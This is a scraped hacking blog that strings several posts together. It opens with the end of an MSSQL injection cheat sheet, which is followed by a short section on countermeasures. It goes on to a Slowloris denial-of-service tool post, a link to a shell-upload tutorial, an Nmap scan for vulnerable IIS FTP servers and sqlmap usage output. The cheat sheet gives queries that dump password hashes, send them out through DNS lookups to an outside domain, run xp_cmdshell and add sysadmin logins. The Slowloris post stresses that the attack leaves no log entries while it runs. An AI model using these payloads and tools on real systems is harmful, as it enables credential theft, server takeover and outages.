| | SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID |
|---------------|---------------------------------------------------------------------------|
| List Users | SELECT name FROM master..syslogins |
|---------------|---------------------------------------------------------------------------|
| | MSSQL2000: SELECT name, password FROM master..sysxlogins -- priv |
| | |
| | SELECT name, master.dbo.fn_varbintohexstr(password) |
| | FROM master..sysxlogins -- priv |
| List Password | |
| Hashes | MSSQL2005: SELECT name, password_hash FROM |
| | master.sys.sql_logins -- priv |
| | |
| | SELECT name + '-' + |
| | master.sys.fn_varbintohexstr(password_hash) |
| | FROM master.sys.sql_logins -- priv |
|---------------|---------------------------------------------------------------------------|
| | SELECT is_srvrolemember('sysadmin'); -- is your account a sysadmin? |
| | returns 1 for true, 0 for false, NULL for invalid role. |
| | Also try 'bulkadmin', 'systemadmin' and other values. |
| List DBA | |
| Accounts | |
| | SELECT is_srvrolemember('sysadmin', 'sa'); -- is sa a sysadmin? |
| | return 1 for true, 0 for false, NULL for invalid role/username. |
|---------------|---------------------------------------------------------------------------|
| Current DB | SELECT DB_NAME() |
|---------------|---------------------------------------------------------------------------|
| List | SELECT name FROM master..sysdatabases; |
| Databases | SELECT DB_NAME(N); -- for N = 0, 1, 2, ... |
|---------------|---------------------------------------------------------------------------|
| | SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE |
| | name = 'mytable'); -- for the current DB only |
| | |
| List Columns | SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM |
| | master..syscolumns, master..sysobjects WHERE |
| | master..syscolumns.id=master..sysobjects.id AND |
| | master..sysobjects.name='sometable'; -- list colum names |
| | and types for master..sometable |
|---------------|---------------------------------------------------------------------------|
| | SELECT name FROM master..sysobjects WHERE xtype = 'U'; |
| | (Use xtype = 'V' for views) |
| | SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U'; |
| | |
| List Tables | SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) |
| | FROM master..syscolumns, master..sysobjects WHERE |
| | master..syscolumns.id=master..sysobjects.id AND |
| | master..sysobjects.name='sometable'; -- list column names and types |
| | for master..sometable |
|---------------|---------------------------------------------------------------------------|
| | -- NB: This example works only for the current database. |
| | If you wan't to search another db, you need to specify the db name |
| Find Tables | (e.g. replace sysobject with mydb..sysobjects). |
| From | |
| Column Name | SELECT sysobjects.name as tablename, syscolumns.name as columnname |
| | FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id |
| | WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%PASSWORD%' -- |
| | this lists table, column for each column containing the word 'password' |
|---------------|---------------------------------------------------------------------------|
| Select | SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins |
| Nth Row | ORDER BY name ASC) sq ORDER BY name DESC -- gets 9th row |
|---------------|---------------------------------------------------------------------------|
|Select Nth Char| SELECT substring('abcd', 3, 1) -- returns c |
|---------------|---------------------------------------------------------------------------|
| Bitwise AND | SELECT 6 & 2 -- returns 2 |
| | SELECT 6 & 1 -- returns 0 |
|---------------|---------------------------------------------------------------------------|
| ASCII Value | SELECT char(0x41) -- returns A |
| -> Char | |
|---------------|---------------------------------------------------------------------------|
| Char -> ASCII | SELECT ascii('A') - returns 65 |
| Value | |
|---------------|---------------------------------------------------------------------------|
| Casting | SELECT CAST('1' as int); |
| | SELECT CAST(1 as char) |
|---------------|---------------------------------------------------------------------------|
| String | SELECT 'A' + 'B' - returns AB |
| Concatenation | |
|---------------|---------------------------------------------------------------------------|
| If Statement | IF (1=1) SELECT 1 ELSE SELECT 2 -- returns 1 |
|---------------|---------------------------------------------------------------------------|
|Case Statement | SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END -- returns 1 |
|---------------|---------------------------------------------------------------------------|
|Avoiding Quotes| SELECT char(65)+char(66) -- returns AB |
|---------------|---------------------------------------------------------------------------|
| Time Delay | WAITFOR DELAY '0:0:5' -- pause for 5 seconds |
|---------------|---------------------------------------------------------------------------|
| | declare @host varchar(800); select @host = name FROM master..syslogins; |
| | exec('master..xp_getfiledetails ''\\' + @host + '\c$\boot.ini'''); |
| | -- nonpriv, works on 2000 |
| | |
| | declare @host varchar(800); select @host = name + '-' + |
| Make | master.sys.fn_varbintohexstr(password_hash) + '.2.pentestmonkey.net' |
| DNS Requests | from sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini''');|
| | -- priv, works on 2005 |
| | |
| | -- NB: Concatenation is not allowed in calls to these SPs, hence why we |
| | have to use @host. Messy but necessary. |
| | -- Also check out theDNS tunnel feature of sqlninja |
|---------------|---------------------------------------------------------------------------|
| Command | EXEC xp_cmdshell 'net user'; -- priv |
| Execution | |
|---------------|---------------------------------------------------------------------------|
| Local | CREATE TABLE mydata (line varchar(8000)); |
| File Access | BULK INSERT mydata FROM 'c:\boot.ini'; |
| | DROP TABLE mydata; |
|---------------|---------------------------------------------------------------------------|
| Hostname, IP | SELECT HOST_NAME() |
|---------------|---------------------------------------------------------------------------|
| Create Users | EXEC sp_addlogin 'user', 'pass'; -- priv |
|---------------|---------------------------------------------------------------------------|
| Drop Users | EXEC sp_droplogin 'user'; -- priv |
|---------------|---------------------------------------------------------------------------|
| Make User DBA | EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin; -- priv |
+---------------+---------------------------------------------------------------------------+
########################################
[0x06] - SQL Injection Countermeasures
########################################
Main cause of SQL injection vulnerability is input validation. Many web developers do not provide
proper mechanism in order to sanitize any form of input. So, attackers take advantage of this point and gain access
to many databases. There are solutions to prevent SQL injection vulnerability.
- Use whilelist input: because we cannot know all of bad inputs, so the efficient way is to allow only our known-valid input
- Check input type: in some cases, attackers inject string into numeric input field or inject numeric into string input field,
these may cause SQL injection vulnerability
- Escape database metacharacters: use / in order to escape database metacharacters by prepending / in front of metacharaters.
- Don't ignore any ways of input: attackers can manipulate input to exploit SQL vulnerabilities, so you must not care only query string but also headers,
cookies and form fields as well
- Use Parameterized Queries: MSSQL provides API for handling inputs which can help us to prevent SQL injection.
This mechanism is called "Parameterized Queries".
The following two code samples illustrate the difference between an unsafe query dynamically constructed out of
user data, and its safe parameterized counterpart.
In the first, the user-supplied name parameter is embeded directly into a SQL statement, leaving the
application vulnerable to SQL injection:
//define the query structure
string queryText = "select ename,sak from emp where ename ='";
//concatenate the user-supplied name
queryText += request.getParameter("name");
queryText += "'";
//execute the query
stmt = con.createStatement();
rs = stmt.executeQuery(queryText);
In the second example, the query structure is defined using a question mark as a placeholder
for the user-supplied parameter. The prepareStatement method is invoked to interpret this, and fix the structure
of the query that is to be executed. Only then is the setString method used to specify the actual value of
the parameter. Because the query's structure has already been fixed, this value can contain any data at all,
without affecting the structure. The query is then executed safely:
//define the query structure
String queryText = "select ename,sal from emp where ename = ?";
//prepare the statement through DB connection "con"
stmt = con.prepareStatement(queryText);
//add the user input to variable 1 (at the first ? placeholder)
stmt.setSting(1, request.getParameter("name"));
//execute the query
rs = stmt.executeQuery();
#####################
[0x07] - References
#####################
[1] Error based SQL injection - a true story: AnalyseR
[2] Advanced SQL Injection In SQL Server Applications: Chris Anley
[3] ASCII Encoded/Binary String Automated SQL Injection Attack: Michael Zino
[4] http://pentestmonkey.net
[5] http://www.owasp.org
[6] http://www.milw0rm.com
####################
[0x08] - Greetz To
####################
Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK
Special Thx : asylu3, str0ke, citec.us, milw0rm.com
----------------------------------------------------
This paper is written for Educational purpose only. The authors are not responsible for any damage
originating from using this paper in wrong objective. If you want to use this knowledge with other person systems,
you must request for consent from system owner before
----------------------------------------------------
# milw0rm.com [2009-01-29]</a></stdin></stdin></pre><a $line(@stuff)="" $out="$1;" $ua="LWP::UserAgent-" \"="" class="l/ig)" foreach="" g;="" href="http://www.blogger.com/,$c);" if($line="~/(.*)" s="" {=""><pre></pre><pre><b>Source:</b></pre></a><pre><a href="http://www.milw0rm.com/papers/279">http://www.milw0rm.com/papers/279</a></pre>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-456962442660639401.post-60894981506191562202010-01-28T17:52:00.000-08:002010-11-28T17:59:10.934-08:00Slowloris HTTP DoS<pre><span style="font-size: 9px; line-height: 8pt;">CCCCCCCCCCOOCCOOOOO888@8@8888OOOOCCOOO888888888@@@@@@@@@8@8@@@@888OOCooocccc::::
CCCCCCCCCCCCCCCOO888@888888OOOCCCOOOO888888888888@88888@@@@@@@888@8OOCCoococc:::
CCCCCCCCCCCCCCOO88@@888888OOOOOOOOOO8888888O88888888O8O8OOO8888@88@@8OOCOOOCoc::
CCCCooooooCCCO88@@8@88@888OOOOOOO88888888888OOOOOOOOOOCCCCCOOOO888@8888OOOCc::::
CooCoCoooCCCO8@88@8888888OOO888888888888888888OOOOCCCooooooooCCOOO8888888Cocooc:
ooooooCoCCC88@88888@888OO8888888888888888O8O8888OOCCCooooccccccCOOOO88@888OCoccc
ooooCCOO8O888888888@88O8OO88888OO888O8888OOOO88888OCocoococ::ccooCOO8O888888Cooo
oCCCCCCO8OOOCCCOO88@88OOOOOO8888O888OOOOOCOO88888O8OOOCooCocc:::coCOOO888888OOCC
oCCCCCOOO88OCooCO88@8OOOOOO88O888888OOCCCCoCOOO8888OOOOOOOCoc::::coCOOOO888O88OC
oCCCCOO88OOCCCCOO8@@8OOCOOOOO8888888OoocccccoCO8O8OO88OOOOOCc.:ccooCCOOOO88888OO
CCCOOOO88OOCCOOO8@888OOCCoooCOO8888Ooc::...::coOO88888O888OOo:cocooCCCCOOOOOO88O
CCCOO88888OOCOO8@@888OCcc:::cCOO888Oc..... ....cCOOOOOOOOOOOc.:cooooCCCOOOOOOOOO
OOOOOO88888OOOO8@8@8Ooc:.:...cOO8O88c. . .coOOO888OOOOCoooooccoCOOOOOCOOOO
OOOOO888@8@88888888Oo:. . ...cO888Oc.. :oOOOOOOOOOCCoocooCoCoCOOOOOOOO
COOO888@88888888888Oo:. .O8888C: .oCOo. ...cCCCOOOoooooocccooooooooCCCOO
CCCCOO888888O888888Oo. .o8Oo. .cO88Oo: :. .:..ccoCCCooCooccooccccoooooCCCC
coooCCO8@88OO8O888Oo:::... .. :cO8Oc. . ..... :. .:ccCoooooccoooocccccooooCCC
:ccooooCO888OOOO8OOc..:...::. .co8@8Coc::.. .... ..:cooCooooccccc::::ccooCCooC
.:::coocccoO8OOOOOOC:..::....coCO8@8OOCCOc:... ....:ccoooocccc:::::::::cooooooC
....::::ccccoCCOOOOOCc......:oCO8@8@88OCCCoccccc::c::.:oCcc:::cccc:..::::coooooo
.......::::::::cCCCCCCoocc:cO888@8888OOOOCOOOCoocc::.:cocc::cc:::...:::coocccccc
...........:::..:coCCCCCCCO88OOOO8OOOCCooCCCooccc::::ccc::::::.......:ccocccc:co
.............::....:oCCoooooCOOCCOCCCoccococc:::::coc::::....... ...:::cccc:cooo
..... ............. .coocoooCCoco:::ccccccc:::ccc::.......... ....:::cc::::coC
. . ... .... .. .:cccoCooc:.. ::cccc:::c:.. ......... ......::::c:cccco
. .. ... .. .. .. ..:...:cooc::cccccc:..... ......... .....:::::ccoocc
. . .. ..::cccc:.::ccoocc:. ........... .. . ..:::.:::::::ccco</span></pre><pre><span style="font-size: 9px; line-height: 8pt;">
</span></pre><b>Welcome to <b style="background-color: #ffff66; color: black;">Slowloris</b> - the low bandwidth, yet greedy and poisonous HTTP client!</b><br />
Written by <a href="http://ha.ckers.org/">RSnake</a> with help from John Kinsella, and a dash of inspiration from <a href="http://www.outpost24.com/">Robert E Lee</a>.<br />
<b>UPDATE 2:</b> Video presentation of <b style="background-color: #ffff66; color: black;">Slowloris</b> at DefCon (the middle section of the presentation) can be seen here: <a href="http://vimeo.com/7618090">Hijacking Web 2.0 Sites with SSLstrip and <b style="background-color: #ffff66; color: black;">SlowLoris</b> -- Sam Bowne and RSnake at Defcon 17</a>.<br />
<b>UPDATE:</b> Amit Klein pointed me to a <a href="http://www.securityfocus.com/archive/1/456339/30/0/threaded">post written by Adrian Ilarion Ciobanu written in early 2007</a> that perfectly describes this denial of service attack. It was also described in 2005 in the "Programming Model Attacks" section of Apache Security. So although there was no tool released at that time these two still technically deserves all the credit for this. I apologize for having missed these.<br />
In considering the ramifications of a slow denial of service attack against particular services, rather than flooding networks, a concept emerged that would allow a single machine to take down another machine's web server with minimal bandwidth and side effects on unrelated services and ports. The ideal situation for many denial of service attacks is where all other services remain intact but the webserver itself is completely inaccessible. <b style="background-color: #ffff66; color: black;">Slowloris</b> was born from this concept, and is therefore relatively very stealthy compared to most flooding tools.<br />
<br />
<b style="background-color: #ffff66; color: black;">Slowloris</b> holds connections open by sending partial HTTP requests. It continues to send subsequent headers at regular intervals to keep the sockets from closing. In this way webservers can be quickly tied up. In particular, servers that have threading will tend to be vulnerable, by virtue of the fact that they attempt to limit the amount of threading they'll allow. <b style="background-color: #ffff66; color: black;">Slowloris</b> must wait for all the sockets to become available before it's successful at consuming them, so if it's a high traffic website, it may take a while for the site to free up it's sockets. So while you may be unable to see the website from your vantage point, others may still be able to see it until all sockets are freed by them and consumed by <b style="background-color: #ffff66; color: black;">Slowloris</b>. This is because other users of the system must finish their requests before the sockets become available for <b style="background-color: #ffff66; color: black;">Slowloris</b> to consume. If others re-initiate their connections in that brief time-period they'll still be able to see the site. So it's a bit of a race condition, but one that <b style="background-color: #ffff66; color: black;">Slowloris</b> will eventually always win - and sooner than later.<br />
<br />
<b style="background-color: #ffff66; color: black;">Slowloris</b> also has a few stealth features built into it. Firstly, it can be changed to send different host headers, if your target is a virtual host and logs are stored seperately per virtual host. But most importantly, while the attack is underway, the log file won't be written until the request is completed. So you can keep a server down for minutes at a time without a single log file entry showing up to warn someone who might watching in that instant. Of course once your attack stops or once the session gets shut down there will be several hundred 400 errors in the web server logs. That's unavoidable as <b style="background-color: #ffff66; color: black;">Slowloris</b> sits today, although it may be possible to turn them into 200 OK messages instead by completing a valid request, but <b style="background-color: #ffff66; color: black;">Slowloris</b> doesn't yet do that.<br />
<br />
HTTPReady quickly came up as a possible solution to a <b style="background-color: #ffff66; color: black;">Slowloris</b> attack, because it won't cause the HTTP server to launch until a full request is recieved. This is true only for GET and HEAD requests. As long as you give <b style="background-color: #ffff66; color: black;">Slowloris</b> the switch to modify it's method to POST, HTTPReady turns out to be a worthless defense against this type of attack.<br />
<br />
This is <b><i>NOT</i></b> a TCP DoS, because it is actually making a full TCP connection, not a partial one, however it <i>is</i> making partial HTTP requests. It's the equivalent of a SYN flood but over HTTP. One example of the difference is that if there are two web-servers running on the same machine one server can be DoSed without affecting the other webserver instance. <b style="background-color: #ffff66; color: black;">Slowloris</b> would also theoretically work over other protocols like UDP, if the program was modified slightly and the webserver supported it. <b style="background-color: #ffff66; color: black;">Slowloris</b> is also <b><i>NOT</i></b> a GET request flooder. <b style="background-color: #ffff66; color: black;">Slowloris</b> requires only a few hundred requests at long term and regular intervals, as opposed to tens of thousands on an ongoing basis.<br />
<br />
Interestingly enough, in testing this has been shown in at least one instance to lock up database connections and force other strange issues and errors to arise that can allow for fingerprinting and other odd things to become obvious once the DoS is complete and the server attempts to clean itself up. I would guess that this issue arises when the webserver is allowed to open more connections than the database is, causing the database to fail first and for longer than the webserver.<br />
<br />
<b style="background-color: #ffff66; color: black;">Slowloris</b> lets the webserver return to normal almost instantly (usually within 5 seconds or so). That makes it ideal for certain attacks that may just require a brief down-time. As described in <a href="http://ha.ckers.org/blog/20090504/using-denial-of-service-for-hacking/">this blog post, DoS is actually very useful for certain types of attacks</a> where timing is key, or as a diversionary tactic, etc....<br />
This affects a number of webservers that use threaded processes and ironically attempt to limit that to prevent memory exhaustion - fixing one problem created another. This includes but is not necessarily limited to the following:<br />
<br />
<ul><li>Apache 1.x </li>
<li>Apache 2.x </li>
<li>dhttpd </li>
<li>GoAhead WebServer </li>
<li>WebSense "block pages" (unconfirmed) </li>
<li>Trapeze Wireless Web Portal (unconfirmed) </li>
<li>Verizon's MI424-WR FIOS Cable modem (unconfirmed) </li>
<li>Verizon's Motorola Set-Top Box (port 8082 and requires auth - unconfirmed) </li>
<li><a href="http://www.bee-ware.net/en/">BeeWare</a> WAF (unconfirmed) </li>
<li><a href="http://www.denyall.com/">Deny All</a> WAF (unconfirmed) </li>
</ul>There are a number of webservers that this doesn't affect as well, in my testing:<br />
<br />
<ul><li>IIS6.0 </li>
<li>IIS7.0 </li>
<li>lighttpd </li>
<li>Squid </li>
<li>nginx </li>
<li>Cherokee (<a href="http://lists.octality.com/pipermail/cherokee/2009-June/010530.html">verified by user community</a>) </li>
<li>Netscaler </li>
<li>Cisco CSS (<a href="http://www.cupfighter.net/index.php/2009/06/slowloris-css/">verified by user community</a>) </li>
</ul>This is obviously not a complete list, and there may be a number of variations on these web-servers that are or are not vulnerable. I didn't test every configuration or variant, so your mileage may vary. This also may not work if there is an upstream device that somehow limits/buffers/proxies HTTP requests. Please note though that <b><b style="background-color: #ffff66; color: black;">Slowloris</b> only represents one variant of this attack</b> and other variants may have different impacts on other webservers and upstream devices. This command should work on most systems, but please be sure to check the options as well:<br />
<b>perl <b style="background-color: #ffff66; color: black;">slowloris</b>.pl -dns example.com</b><br />
Requirements: This is a Perl program requiring the Perl interpreter with the modules <a href="http://perldoc.perl.org/IO/Socket/INET.html">IO::Socket::INET</a>, <a href="http://search.cpan.org/%7Ebehroozi/IO-Socket-SSL-0.97/">IO::Socket::SSL</a>, and <a href="http://search.cpan.org/%7Ejv/Getopt-Long-2.38/">GetOpt::Long</a>. <b style="background-color: #ffff66; color: black;">Slowloris</b> works MUCH better and faster if you have threading, so I highly encourage you to also install threads and threads::shared if you don't have those modules already. You can install modules using CPAN:<br />
<blockquote>perl -MCPAN -e 'install IO::Socket::INET'<br />
perl -MCPAN -e 'install IO::Socket::SSL'</blockquote><img align="left" height="50" src="http://ha.ckers.org/images/microsoft_icon.gif" width="50" /><b>Windows users</b>: You probably will not be able to successfuly execute a <b style="background-color: #ffff66; color: black;">Slowloris</b> denial of service from Windows even if you use <a href="http://www.cygwin.com/">Cygwin</a>. I have not had any luck getting <b style="background-color: #ffff66; color: black;">Slowloris</b> to successfuly deny service from within Windows, because <b style="background-color: #ffff66; color: black;">Slowloris</b> requires more than a few hundred sockets to work (sometimes a thousand or more), and Windows limits sockets to around 130, from what I've seen. I highly suggest you use a *NIX operating system to execute <b style="background-color: #ffff66; color: black;">Slowloris</b> from for the best results, and not from within a virtual machine, as that could have unexpected results based on the parent operating system.<br />
Version: <b style="background-color: #ffff66; color: black;">Slowloris</b> is currently at version 0.7 - 06/17/2009<br />
<br />
Download: <a href="http://ha.ckers.org/slowloris/slowloris.pl"><b style="background-color: #ffff66; color: black;">slowloris</b>.pl</a><br />
<br />
Getting started: <b>perldoc <b style="background-color: #ffff66; color: black;">slowloris</b>.pl</b><br />
Issues: For a complete list of issues look at the Perl documentation, which explains all of the things to think about when running this denial of service attack.<br />
Thanks: Thank you to John Kinsella for the help with threading and <a href="http://ha.ckers.org/blog/about/">id</a> and greyhat for help with testing.<br />
<br />
<b>Reference:</b> <br />
http://ha.ckers.org/slowloris/Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-456962442660639401.post-36958052038969222552009-10-20T09:11:00.000-07:002009-10-20T13:40:01.688-07:00Uploading Shell Through SQL Injection [Into Outfile]Uploading Shell Through SQL Injection [Into Outfile]<br /><br />http://rapidshare.com/files/22917340/mysql_into_outfile.rar.html<br /><br />http://rapidshare.de/files/46569137/mysql_into_outfile.zip.html<br />Pass: security-shell.wsUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-456962442660639401.post-36600226558832998902009-09-04T15:41:00.000-07:002009-09-04T15:45:40.876-07:00Detecting Vulnerable IIS-FTP Hosts Using NmapBased on an existing Nmap script, I quickly wrote a new one which performs the following actions:<br /><br /> * Check if anonymous sessions are allowed.<br /> * Check if the detected FTP server is running Microsoft ftpd.<br /> * Check if the MKDIR command is allowed (this seems to be required by the exploit)<br /><br />If all those conditions are met, the script exits with a warning message. Note that my script will only report servers which could be vulnerable. On the other side, running a server with anonymous users able to create directories is a major security breach and must be fixed independently of the newly discovered vulnerability!<br /><br />To use the Nmap script, copy it in your local script repositoty (something like /usr/local/share/nmap/scripts/) and rebuild your scripts index:<br /><br /># nmap --script-updatedb<br /><br />Then, the script will be executed against all detected FTP servers (using the “-Sc” argument) or you can specify only one script to be executed (for speed):<br /><font color=yellow><br /># nmap -p 21 -sV --script=IIS-FTP 10.0.0.7<br /></font><br />Starting Nmap 4.76 ( http://nmap.org ) at 2009-09-01 01:15 CEST<br />Interesting ports on test-win (10.0.0.7):<br />PORT STATE SERVICE VERSION<br />21/tcp open ftp Microsoft ftpd<br />|_ IIS FTP: IIS Server allow anonymous and mkdir (potentially vulnerable)<br />Service Info: OS: Windows<br /><br />The script is available here. Note that it is provided “as is”. it’s just a quick hack which worked for me.<br /><br />Maybe you were not aware of the Nmap scripting capabilities. Feel free to read this small introduction to Nmap scripting.<br /><br /><b>Reference:</b><br /><a href="http://blog.rootshell.be/2009/09/01/detecting-vulnerable-iis-ftp-hosts-using-nmap/" target="_blank">http://blog.rootshell.be/2009/09/01/detecting-vulnerable-iis-ftp-hosts-using-nmap/</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-456962442660639401.post-60968963527207064592009-08-23T10:12:00.000-07:002009-08-23T10:37:25.571-07:00sqlmap 0.7Consider that the target url is:<br /><br /><font color=royalblue> http://192.168.1.121/sqlmap/mysql/get_int.php?id=1 </font><br /><br />Assume that:<br /><br /><font color=royalblue> http://192.168.1.121/sqlmap/mysql/get_int.php?id=1+AND+1=1 </font><br /><br />is the same page as the original one and:<br /><br /><font color=royalblue> http://192.168.1.121/sqlmap/mysql/get_int.php?id=1+AND+1=2 </font><br /><br /><b>Usage</b><br />$<font color=lime> python sqlmap.py -h </font><br /> <br /> sqlmap/0.7<br /> by Bernardo Damele A. G. <bernardo.damele@gmail.com><br /> <br />Usage: sqlmap.py [options]<br /><br />Options:<br /> --version show program's version number and exit<br /> -h, --help show this help message and exit<br /> -v VERBOSE Verbosity level: 0-5 (default 1)<br /><br /> Target:<br /> At least one of these options has to be specified to set the source to<br /> get target urls from.<br /><br /> -u URL, --url=URL Target url<br /> -l LIST Parse targets from Burp or WebScarab logs<br /> -g GOOGLEDORK Process Google dork results as target urls<br /> -c CONFIGFILE Load options from a configuration INI file<br /><br /> Request:<br /> These options can be used to specify how to connect to the target url.<br /><br /> --method=METHOD HTTP method, GET or POST (default GET)<br /> --data=DATA Data string to be sent through POST<br /> --cookie=COOKIE HTTP Cookie header<br /> --referer=REFERER HTTP Referer header<br /> --user-agent=AGENT HTTP User-Agent header<br /> -a USERAGENTSFILE Load a random HTTP User-Agent header from file<br /> --headers=HEADERS Extra HTTP headers newline separated<br /> --auth-type=ATYPE HTTP Authentication type (value Basic or Digest)<br /> --auth-cred=ACRED HTTP Authentication credentials (value name:password)<br /> --proxy=PROXY Use a HTTP proxy to connect to the target url<br /> --threads=THREADS Maximum number of concurrent HTTP requests (default 1)<br /> --delay=DELAY Delay in seconds between each HTTP request<br /> --timeout=TIMEOUT Seconds to wait before timeout connection (default 30)<br /> --retries=RETRIES Retries when the connection timeouts (default 3)<br /><br /> Injection:<br /> These options can be used to specify which parameters to test for,<br /> provide custom injection payloads and how to parse and compare HTTP<br /> responses page content when using the blind SQL injection technique.<br /><br /> -p TESTPARAMETER Testable parameter(s)<br /> --dbms=DBMS Force back-end DBMS to this value<br /> --os=OS Force back-end DBMS operating system to this value<br /> --prefix=PREFIX Injection payload prefix string<br /> --postfix=POSTFIX Injection payload postfix string<br /> --string=STRING String to match in page when the query is valid<br /> --regexp=REGEXP Regexp to match in page when the query is valid<br /> --excl-str=ESTRING String to be excluded before comparing page contents<br /> --excl-reg=EREGEXP Matches to be excluded before comparing page contents<br /><br /> Techniques:<br /> These options can be used to test for specific SQL injection technique<br /> or to use one of them to exploit the affected parameter(s) rather than<br /> using the default blind SQL injection technique.<br /><br /> --stacked-test Test for stacked queries (multiple statements) support<br /> --time-test Test for time based blind SQL injection<br /> --time-sec=TIMESEC Seconds to delay the DBMS response (default 5)<br /> --union-test Test for UNION query (inband) SQL injection<br /> --union-tech=UTECH Technique to test for UNION query SQL injection<br /> --union-use Use the UNION query (inband) SQL injection to retrieve<br /> the queries output. No need to go blind<br /><br /> Fingerprint:<br /> -f, --fingerprint Perform an extensive DBMS version fingerprint<br /><br /> Enumeration:<br /> These options can be used to enumerate the back-end database<br /> management system information, structure and data contained in the<br /> tables. Moreover you can run your own SQL statements.<br /><br /> -b, --banner Retrieve DBMS banner<br /> --current-user Retrieve DBMS current user<br /> --current-db Retrieve DBMS current database<br /> --is-dba Detect if the DBMS current user is DBA<br /> --users Enumerate DBMS users<br /> --passwords Enumerate DBMS users password hashes (opt -U)<br /> --privileges Enumerate DBMS users privileges (opt -U)<br /> --dbs Enumerate DBMS databases<br /> --tables Enumerate DBMS database tables (opt -D)<br /> --columns Enumerate DBMS database table columns (req -T opt -D)<br /> --dump Dump DBMS database table entries (req -T, opt -D, -C)<br /> --dump-all Dump all DBMS databases tables entries<br /> -D DB DBMS database to enumerate<br /> -T TBL DBMS database table to enumerate<br /> -C COL DBMS database table column to enumerate<br /> -U USER DBMS user to enumerate<br /> --exclude-sysdbs Exclude DBMS system databases when enumerating tables<br /> --start=LIMITSTART First query output entry to retrieve<br /> --stop=LIMITSTOP Last query output entry to retrieve<br /> --sql-query=QUERY SQL statement to be executed<br /> --sql-shell Prompt for an interactive SQL shell<br /><br /> File system access:<br /> These options can be used to access the back-end database management<br /> system underlying file system.<br /><br /> --read-file=RFILE Read a file from the back-end DBMS file system<br /> --write-file=WFILE Write a local file on the back-end DBMS file system<br /> --dest-file=DFILE Back-end DBMS absolute filepath to write to<br /><br /> Operating system access:<br /> This option can be used to access the back-end database management<br /> system underlying operating system.<br /><br /> --os-cmd=OSCMD Execute an operating system command<br /> --os-shell Prompt for an interactive operating system shell<br /> --os-pwn Prompt for an out-of-band shell, meterpreter or VNC<br /> --os-smbrelay One click prompt for an OOB shell, meterpreter or VNC<br /> --os-bof Stored procedure buffer overflow exploitation<br /> --priv-esc User priv escalation by abusing Windows access tokens<br /> --msf-path=MSFPATH Local path where Metasploit Framework 3 is installed<br /> --tmp-path=TMPPATH Remote absolute path of temporary files directory<br /><br /> Miscellaneous:<br /> --eta Display for each output the estimated time of arrival<br /> --update Update sqlmap to the latest stable version<br /> -s SESSIONFILE Save and resume all data retrieved on a session file<br /> --save Save options on a configuration INI file<br /> --batch Never ask for user input, use the default behaviour<br /> --cleanup Clean up the DBMS by sqlmap specific UDF and tables<br /><br /><br /><b>5.1 Output verbosity</b><br /><br />Option: -v<br /><br />Verbose options can be used to set the verbosity level of output messages. There exist six levels. The default level is 1 in which information, warnings, errors and tracebacks, if they occur, will be shown. Level 2 shows also debug messages, level 3 shows also HTTP requests with all HTTP headers sent, level 4 shows also HTTP responses headers and level 5 shows also HTTP responses page content.<br /><br />Example on a MySQL 5.0.67 target (verbosity level 1):<br /><br /> $ <font color=lime>python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1 </font><br /><font color=aqua><br /> [hh:mm:12] [INFO] testing connection to the target url<br /> [hh:mm:12] [INFO] testing if the url is stable, wait a few seconds<br /> [hh:mm:14] [INFO] url is stable<br /> [hh:mm:14] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic<br /> [hh:mm:14] [WARNING] User-Agent parameter 'User-Agent' is not dynamic<br /> [hh:mm:14] [INFO] testing if GET parameter 'id' is dynamic<br /> [hh:mm:14] [INFO] confirming that GET parameter 'id' is dynamic<br /> [hh:mm:14] [INFO] GET parameter 'id' is dynamic<br /> [hh:mm:14] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis<br /> [hh:mm:14] [INFO] testing unescaped numeric injection on GET parameter 'id'<br /> [hh:mm:14] [INFO] confirming unescaped numeric injection on GET parameter 'id'<br /> [hh:mm:14] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis<br /> [hh:mm:14] [INFO] testing for parenthesis on injectable parameter<br /> [hh:mm:14] [INFO] the injectable parameter requires 0 parenthesis<br /> [hh:mm:14] [INFO] testing MySQL<br /> [hh:mm:14] [INFO] query: CONCAT(CHAR(53), CHAR(53))<br /> [hh:mm:14] [INFO] retrieved: 55<br /> [hh:mm:14] [INFO] performed 20 queries in 0 seconds<br /> [hh:mm:14] [INFO] confirming MySQL<br /> [hh:mm:14] [INFO] query: LENGTH(CHAR(53))<br /> [hh:mm:14] [INFO] retrieved: 1<br /> [hh:mm:14] [INFO] performed 13 queries in 0 seconds<br /> [hh:mm:14] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 0, 1<br /> [hh:mm:14] [INFO] retrieved: 5<br /> [hh:mm:14] [INFO] performed 13 queries in 0 seconds<br /><font color=red> web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)<br /> web application technology: PHP 5.2.6, Apache 2.2.9<br /> back-end DBMS: MySQL >= 5.0.0 </font><br /></font><br /><br /><b>To run sqlmap on a single target URL.</b><br /><br />Example on a MySQL 5.0.67 target:<br /><br /> $ <font color=lime> python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" </font><br /><br /> [...]<br /><font color=red> web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)<br /> web application technology: PHP 5.2.6, Apache 2.2.9<br /> back-end DBMS: MySQL >= 5.0.0</font><br /><br /><b>Process Google dork results as target urls</b><br /><br />Option: -g<br /><br />It is also possible to test and inject on GET parameters on the results of your Google dork.<br /><br />This option makes sqlmap negotiate with the search engine its session cookie to be able to perform a search, then 